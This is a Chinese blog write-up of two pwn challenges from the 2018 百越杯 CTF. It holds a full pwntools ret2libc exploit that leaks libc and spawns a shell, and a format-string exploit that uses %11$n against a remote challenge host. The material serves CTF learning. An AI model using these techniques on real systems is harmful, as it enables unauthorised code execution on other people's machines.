<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn,">





  <link rel="alternate" href="/atom.xml" title="xfgg" type="application/atom+xml">






<meta name="description" content="最近省赛要开始了，把去年的题目重新详细的做一遍 较为简单 借鉴了csdn大佬的博客 栈溢出后多个地址和参数的排列顺序的规则12345678910111213以一个简单的函数为例void foo(int x)&amp;#123;int y;x++;y = 4;&amp;#125;int main(void)&amp;#123;foo(2);return 0;&amp;#125;   12在调用函数的时候，要传入的参数会放在RET之">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="2018百越杯 pwn">
<meta property="og:url" content="http://yoursite.com/2019/09/13/Boring game/index.html">
<meta property="og:site_name" content="xfgg">
<meta property="og:description" content="最近省赛要开始了，把去年的题目重新详细的做一遍 较为简单 借鉴了csdn大佬的博客 栈溢出后多个地址和参数的排列顺序的规则12345678910111213以一个简单的函数为例void foo(int x)&amp;#123;int y;x++;y = 4;&amp;#125;int main(void)&amp;#123;foo(2);return 0;&amp;#125;   12在调用函数的时候，要传入的参数会放在RET之">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2018121920353846.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM1NjYxOTkw,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20181220092653787.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20181220092436288.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM1NjYxOTkw,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20181220155403180.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM1NjYxOTkw,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20181202230338363.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20181202225040934.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20181202225210255.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20181202225336403.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxNzQyNzYyMzc3,size_16,color_FFFFFF,t_70">
<meta property="og:updated_time" content="2019-09-13T07:04:08.289Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2018百越杯 pwn">
<meta name="twitter:description" content="最近省赛要开始了，把去年的题目重新详细的做一遍 较为简单 借鉴了csdn大佬的博客 栈溢出后多个地址和参数的排列顺序的规则12345678910111213以一个简单的函数为例void foo(int x)&amp;#123;int y;x++;y = 4;&amp;#125;int main(void)&amp;#123;foo(2);return 0;&amp;#125;   12在调用函数的时候，要传入的参数会放在RET之">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/2018121920353846.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM1NjYxOTkw,size_16,color_FFFFFF,t_70">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/09/13/Boring game/">





  <title>2018百越杯 pwn | xfgg</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">xfgg</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/09/13/Boring game/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="xfgg">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="xfgg">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2018百越杯 pwn</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-09-13T14:02:33+08:00">
                2019-09-13
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/2018百越杯/" itemprop="url" rel="index">
                    <span itemprop="name">2018百越杯</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>最近省赛要开始了，把去年的题目重新详细的做一遍 较为简单</p>
<p>借鉴了csdn大佬的博客</p>
<h3 id="栈溢出后多个地址和参数的排列顺序的规则"><a href="#栈溢出后多个地址和参数的排列顺序的规则" class="headerlink" title="栈溢出后多个地址和参数的排列顺序的规则"></a>栈溢出后多个地址和参数的排列顺序的规则</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">以一个简单的函数为例</span><br><span class="line"></span><br><span class="line">void foo(int x)</span><br><span class="line">&#123;</span><br><span class="line">int y;</span><br><span class="line">x++;</span><br><span class="line">y = <span class="number">4</span>;</span><br><span class="line">&#125;</span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">foo(<span class="number">2</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/2018121920353846.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM1NjYxOTkw,size_16,color_FFFFFF,t_70" alt></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">在调用函数的时候，要传入的参数会放在RET之下，也就是主函数的栈空间的顶端。并且参数是根据调用的顺序依次向下排序的，也就是越早用到越上面。</span><br><span class="line">执行程序</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20181220092653787.png" alt></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">就一个NX（栈不可执行），另外还给了libc.so<span class="number">.6</span>，应该是用ret2libc</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20181220092436288.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM1NjYxOTkw,size_16,color_FFFFFF,t_70" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">溢出点很明显因为是32位的程序，payload填充84+4个字节就能完成溢出</span><br><span class="line"></span><br><span class="line">因为程序内没有现成的system函数，所以要从libc里提取，为此需要知道程序运行之后libc的加载地址，这样得到libc的加载基址后就计算出system函数在程序运行中的实际地址了。</span><br><span class="line"></span><br><span class="line">为此需要用到ret2plt，可以选的函数有puts、write、printf这些程序已经调用过的函数，因为这样plt表中就会有它们对应的got表地址，got表中就存储着这些函数的实际地址，只要控制程序跳转到函数plt表所在位置，程序会根据plt表去查找got表对应位置，从而得到函数在程序运行时的实际位置，以此调用函数。这里我选择在main函数中已经调用过的write函数来泄露got表中write的实际地址（puts和printf也都可以，区别在于参数不同）。</span><br><span class="line"></span><br><span class="line">payload=&apos;a&apos;*(0x54+4)+write_plt_address+game_addr+&apos;1&apos;+write_got_address+&apos;4&apos;</span><br><span class="line"></span><br><span class="line">payload先是用88个‘a’填满缓冲区和ebp，随后是plt表中存储write函数的地址（相当于call write函数），然后跟上game函数的起始地址(main函数首地址也行，目的是为了能第二次进行栈溢出），程序执行完call write后栈顶就变成了game_addr，到时候就会把game_addr当作返回地址。接下来就是write的三个参数，文件标识符，字符串指针，字符串大小。我们需要write的实际地址（puts、printf这些程序之前调用过的函数都在got表中存储着，都可以读取），而这个地址就在got表中存储着。</span><br><span class="line"></span><br><span class="line">执行完第一个payload后，获取到write函数的实际地址，用write_addr-write_libc_addr就能得到libc的加载基址。而加载基址加上libc.so.6中system的地址，就是system函数的实际地址了，同理，也能得到libc中&quot;/bin/sh&quot;字符串的地址，以此构造第二次payload。</span><br><span class="line"></span><br><span class="line">payload=&apos;a&apos;*88+（system_libc_addr+base_addr）+game_addr+（sh_addr+base_addr)</span><br><span class="line"></span><br><span class="line">system调用完/bin/sh后就回弹shell了，因此后面的返回地址可以随便写，反正也回不去了-.-</span><br></pre></td></tr></table></figure>

<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"> </span><br><span class="line"><span class="comment">#context.log_level = 'debug'</span></span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">s=process(<span class="string">"./pwn"</span>)</span><br><span class="line"> </span><br><span class="line"><span class="comment">#gdb.attach(s)</span></span><br><span class="line"> </span><br><span class="line">elf=ELF(<span class="string">'./pwn'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line"> </span><br><span class="line">libc=ELF(<span class="string">'/lib/i386-linux-gnu/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">write_plt=elf.plt[<span class="string">'write'</span>]</span><br><span class="line"> </span><br><span class="line">write_got=elf.got[<span class="string">'write'</span>]</span><br><span class="line"> </span><br><span class="line">game_addr=elf.symbols[<span class="string">'game'</span>]</span><br><span class="line"> </span><br><span class="line">write_libc_addr=libc.symbols[<span class="string">'write'</span>]</span><br><span class="line"> </span><br><span class="line">system_addr=libc.symbols[<span class="string">'system'</span>]</span><br><span class="line"> </span><br><span class="line">sh_addr=next(libc.search(<span class="string">'/bin/sh'</span>))</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">payload=<span class="string">'a'</span>*<span class="number">88</span>+p32(write_plt)+p32(game_addr)+p32(<span class="number">1</span>)+p32(write_got)+p32(<span class="number">4</span>)</span><br><span class="line"> </span><br><span class="line">s.sendlineafter(<span class="string">"name ?\n"</span>,payload)</span><br><span class="line"> </span><br><span class="line"><span class="comment">#gdb.attach(s)</span></span><br><span class="line"> </span><br><span class="line">s.sendlineafter(<span class="string">"? (0 - 1024)\n"</span>,<span class="string">"123"</span>)</span><br><span class="line"><span class="comment">#gdb.attach(s)</span></span><br><span class="line"> </span><br><span class="line">write_addr=u32(s.recvuntil(<span class="string">"What'"</span>)[<span class="number">-9</span>:<span class="number">-5</span>]) <span class="comment">### 这一句就很迷了 跟之前写的rop不一样 也查不到到底是什么意思</span></span><br><span class="line">解决了的话会写个小tip。</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="keyword">print</span> hex(write_addr)</span><br><span class="line"> </span><br><span class="line">base_addr=write_addr-write_libc_addr</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">payload=<span class="string">'a'</span>*<span class="number">88</span>+p32(system_addr+base_addr)+p32(game_addr)+p32(sh_addr+base_addr)</span><br><span class="line"> </span><br><span class="line">s.sendlineafter(<span class="string">"name ?\n"</span>,payload)</span><br><span class="line"> </span><br><span class="line">s.sendlineafter(<span class="string">"? (0 - 1024)\n"</span>,<span class="string">"123"</span>)</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">s.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="format"><a href="#format" class="headerlink" title="format"></a>format</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">最基本的格式化字符串溢出</span><br><span class="line">可以看我之前关于格式化字符串漏洞的文章</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20181220155403180.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM1NjYxOTkw,size_16,color_FFFFFF,t_70" alt></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>、利用格式化漏洞覆盖任意地址的值，这里我们需要覆盖secret的值，所以先要找到secret的地址，在IDA中，可以看到secret在bss段：</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20181202230338363.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">2、利用%k$n（k$用于获取格式化字符串中的指定参数）对指定地址进行覆盖</span><br><span class="line"></span><br><span class="line">（%n，不输出字符，但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量）</span><br><span class="line">3、在栈中找到format的位置和 char s的位置，计算出他们的偏移</span><br><span class="line"></span><br><span class="line">我们用gdb把断点定在printf处</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20181202225040934.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">然后运行，提示输出后，我就随便输入一个 %d%d</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20181202225210255.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">观察栈中的信息</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20181202225336403.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxNzQyNzYyMzc3,size_16,color_FFFFFF,t_70" alt></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">可以看出，printf的第一个参数（format）地址为：<span class="number">0xffffd920</span></span><br><span class="line"></span><br><span class="line">这个format指向<span class="number">0xffffd94c</span>，指向的这个就是我们char s的地址</span><br><span class="line"></span><br><span class="line">有了这两个地址后，我们就可以计算format与char s的地址偏移，</span><br><span class="line"></span><br><span class="line">offset = <span class="number">0xffffd94c</span> - <span class="number">0xffffd920</span> = <span class="number">0x2c</span> = <span class="number">44</span></span><br><span class="line"></span><br><span class="line">由于这是<span class="number">32</span>位程序，所以每个format参数占<span class="number">4</span>个字节，即有<span class="number">44</span>/<span class="number">4</span>=<span class="number">11</span>个参数，也就是说，第<span class="number">11</span>个参数的地址，就是我们char s开始的地址。</span><br><span class="line"></span><br><span class="line">所以 k=<span class="number">11</span>。</span><br><span class="line"></span><br><span class="line">我们把secret的地址放到char s开始的地方，那第<span class="number">11</span>个参数的内容就是secret的地址。</span><br><span class="line"></span><br><span class="line">这样，我们的%<span class="number">11</span>$n就会把输出字符的个数写进secret。</span><br><span class="line"></span><br><span class="line">所以们需要在 %<span class="number">11</span>$n 构造 <span class="number">192</span> 个字符,即%<span class="number">192</span>d，</span><br><span class="line"></span><br><span class="line">但由于我们在char s开始的地方放下了secret的地址，占了<span class="number">4</span>个字节，所以只需要填充<span class="number">188</span>个字符即可，也就是%<span class="number">188</span>d</span><br></pre></td></tr></table></figure>

<h3 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io=process(<span class="string">'./format'</span>)</span><br><span class="line">io=remote(<span class="string">'117.50.13.182'</span>, <span class="number">33865</span>)</span><br><span class="line">payload = p32(<span class="number">0x0804A048</span>) + <span class="string">'%188d'</span> + <span class="string">'%11$n'</span></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>


      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/03/shitsco/" rel="next" title="shitsco">
                <i class="fa fa-chevron-left"></i> shitsco
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/09/17/pwn100/" rel="prev" title="pwn100">
                pwn100 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">xfgg</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">42</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#栈溢出后多个地址和参数的排列顺序的规则"><span class="nav-number">1.</span> <span class="nav-text">栈溢出后多个地址和参数的排列顺序的规则</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp"><span class="nav-number">2.</span> <span class="nav-text">exp</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#format"><span class="nav-number">3.</span> <span class="nav-text">format</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp-1"><span class="nav-number">4.</span> <span class="nav-text">exp</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xfgg</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
